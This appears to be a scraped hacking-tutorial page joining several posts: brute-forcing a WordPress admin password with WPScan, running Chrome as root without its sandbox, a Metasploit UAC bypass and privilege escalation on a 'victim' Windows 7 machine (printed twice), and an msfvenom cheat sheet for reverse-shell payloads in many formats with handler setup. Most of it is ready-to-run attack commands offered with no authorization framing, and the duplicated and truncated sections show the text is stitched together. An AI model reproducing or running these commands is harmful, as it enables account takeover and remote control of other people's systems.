Wordpress Admin username's Password Brute Force Attack

Open terminal in kali linux and type 'wpscan --url http://site.com/ --enumerate u' and hit enter now wait few minutes you will get the users of website now you need the wordlist 'I don't have any wordlist so make your own, i will share the link of wordlist in comments when i make my own wordlist or find the wordlist', save on the desktop wordlist you have created or downloaded and save it as 'wordlist'. Now type 'wpscan --url http://site.com/ --wordlist '/path/wordlist.txt --username USERNAME HERE' (For this step you can drop and drag the wordlist on terminal) and hit enter then wait few minutes for BRUTE FORCE to check the passwords, You will get the password of admin user. 'IF YOUR LUCK IS WITH YOU'

Commands -
root@kali:~# wpscan --url http://site.com/ --enumerate u
root@kali:~# wpscan --url http://site.com/ --wordlist '/path of wordlist/wordlist.txt' --username USERNAME

Note - This will work when the admin user's password is in your wordlist. And sometimes terminal will ask you for 'redirection' simply type 'Y' and hit enter.
PM me if you face any problem while brute forcing the password

[Kali Tut] - How to run google chrome on Kali Linux 2.0 with root

Hi guys!

With Kali Linux 2.0, Google Chrome not start with root Acount.
Today, i will post for you , how to start google chrome on Kali Linux 2.0 with root

1. Run Google Chrome with root on terminal

• #cd /opt/google/chrome#
• #nano google-chrome 
• add line: --user-data-dir

• Save fiel edit
• Open terminal and execute command line #google-chrome --no-sandbox

1. Run Google Chrome with root on shortcut

• #cd /opt/google/chrome#

• #nano google-chrome
• add line: --user-data-dir --no-sandbox
• save file edit
• execute google chrome on desktop

Done!

Good luck!

Facebook: https://facebook.com/pentester72

Youtube: https://www.youtube.com/channel/UCwLM5caRRGycxqxkVjDz0lg

Bypass UAC and get admin privilege in windows 7 using metasploit

Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter.

This picture below taken when hacked successfully gain an access using  Payload create by me.

#meterpreter  >  getuid

When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.

The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate   privileges.

#meterpreter  >  use priv

#meterpreter  >   getsystem

make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.

We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails depending upon the operating system and exploiting method  we are using.

n this above image we are only getting access to normal system user  acount  with less privileges, by executing    post/windows/gather/win_privs command it will list the privilege of the current users logged in.

For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system.

#meterpreter  >   sysinfo

#meterpreter  >     run  post/windows/gather/win_privs

If   the  getsystem  code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.

When we executing  getsystem  command  it will fail because the  current logged user have not enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.

So we first try to bypass UAC enabled in windows  7, Luckily we have windows UAC bypass exploit in metasploit.

Meterpreter on Kali no longer recognized “run bypassuac” instead  we had to use exploit/windows/local/bypassuac.

BypassUAC   exploit  that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems.

For that  we need to background the session, and manually  try bypassuac exploit and load the session recently backgrounded and then exploit and execute  getsystem to get admin privilege.

#meterpreter  > background

#meterpreter  >   search uac

#meterpreter  >   use exploit/windows/local/bypassuac

I exploited this machine with the payload i created before,  so try the  method you used  for exploiting the machine before.

#meterpreter  >   set payload windows/meterpreter/reverse_tcp

#meterpreter  > set   LHOST 192.168.31.20

#meterpreter  > set   LPORT  8080

#meterpreter  >   set   SESSION 1

#meterpreter  >    exploit

After getting acess try getsystem command.

#meterpreter  >  getsystem

Done!

Bypass UAC and get admin privilege in windows 7 using metasploit

Sometimes when you trying to exploit a security hole and success gain an access to the target system, usually you only act as logged user and it’s not a local system account. In this tips and trick there’s a simple step to escalate your privilege when you’re inside meterpreter.

This picture below taken when hacked successfully gain an access using  Payload create by me.

#meterpreter  >  getuid

When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. How do we do that to escalate our privilege to system account?.

The session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

Fortunately, Metasploit has a Meterpreter script, ‘getsystem’, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate   privileges.

#meterpreter  >  use priv

#meterpreter  >   getsystem

make use of the ‘getsystem’ command, if its not already loaded we will need to first load the ‘priv’ extension.

We will let Metasploit try to do the heavy lifting for us by running “getsystem” without any options. The script will attempt every method available to it, stopping when it succeeds.

There are situations where getsystem fails depending upon the operating system and exploiting method  we are using.

n this above image we are only getting access to normal system user  acount  with less privileges, by executing    post/windows/gather/win_privs command it will list the privilege of the current users logged in.

For this tutorial we are exploiting windows 7 as a victim’s machine and by executing a sysinfo command in your meterpeter shell you will get informations about your exploiting system.

#meterpreter  >   sysinfo

#meterpreter  >     run  post/windows/gather/win_privs

If   the  getsystem  code detects that it is running on a Windows 7 with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.

When we executing  getsystem  command  it will fail because the  current logged user have not enough privilege to get admin roles and particularly in windows 7 UAC is defaulty enabled.

So we first try to bypass UAC enabled in windows  7, Luckily we have windows UAC bypass exploit in metasploit.

Meterpreter on Kali no longer recognized “run bypassuac” instead  we had to use exploit/windows/local/bypassuac.

BypassUAC   exploit  that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems.

For that  we need to background the session, and manually  try bypassuac exploit and load the session recently backgrounded and then exploit and execute  getsystem to get admin privilege.

#meterpreter  > background

#meterpreter  >   search uac

#meterpreter  >   use exploit/windows/local/bypassuac

I exploited this machine with the payload i created before,  so try the  method you used  for exploiting the machine before.

#meterpreter  >   set payload windows/meterpreter/reverse_tcp

#meterpreter  > set   LHOST 192.168.31.20

#meterpreter  > set   LPORT  8080

#meterpreter  >   set   SESSION 1

#meterpreter  >    exploit

After getting acess try getsystem command.

#meterpreter  >  getsystem

Done!

Kali Tut - [ How to receive shell from Windows 7,8,10 with setoolkit (So...

Creating Metasploit Payloads on Kali Linux 2.0 Rolling

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

List Payloads

msfvenom -l

Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads




msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php



ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f asp > shell.asp



JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.jsp




WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f war > shell.war



Scripting Payloads



Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.py





Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.sh



Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f raw > shell.pl



Shellcode




For all shellcode see ‘msfvenom –help-formats’ for information as to valid 

parameters. Msfvenom will output code that is able to be cut and pasted in 

this language for your exploits.



Linux Based Shellcode



msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f <language>




Windows Based Shellcode



msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f <language>




Mac Based Shellcode



msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your 

Port to Connect On> -f <language>




Handlers








Metasploit handlers can be great at quickly setting up Metasploit to be in a 

position to receive your incoming shells. Handlers should be in the following 

format.



use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z



Once the required values are completed the following command will execute your 

handler – ‘msfconsole -L -r ‘